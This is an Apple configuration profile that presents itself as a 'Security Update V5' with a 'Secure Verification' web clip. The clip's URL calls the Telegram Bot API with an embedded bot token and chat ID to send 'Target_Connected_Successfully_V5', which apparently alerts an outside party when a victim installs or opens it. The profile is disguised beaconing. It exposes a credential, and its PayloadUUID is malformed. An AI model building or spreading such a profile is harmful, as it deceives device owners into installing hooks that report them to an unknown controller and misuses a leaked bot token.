 <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>URL</key>
            <string>https://api.telegram.org/bot8662750137:AAGEIPealqUPso3hFzdCJrUZln684PaVX3k/sendMessage?chat_id=8639892987&amp;text=Target_Connected_Successfully_V5</string>
            <key>PayloadType</key>
            <string>com.apple.webclip</string>
            <key>Label</key>
            <string>Secure Verification</string>
        </dict>
    </array>
    <key>PayloadDisplayName</key>
    <string>Security Update V5</string>
    <key>PayloadType</key>
    <string>Configuration</string>
    <key>PayloadUUID</key>
    <string>E5F6G7H8-I9J0-K1L2-M3N4-05P6Q7R8S9T0</string>
    <key>PayloadVersion</key>
    <integer>1</integer>
</dict>
</plist>
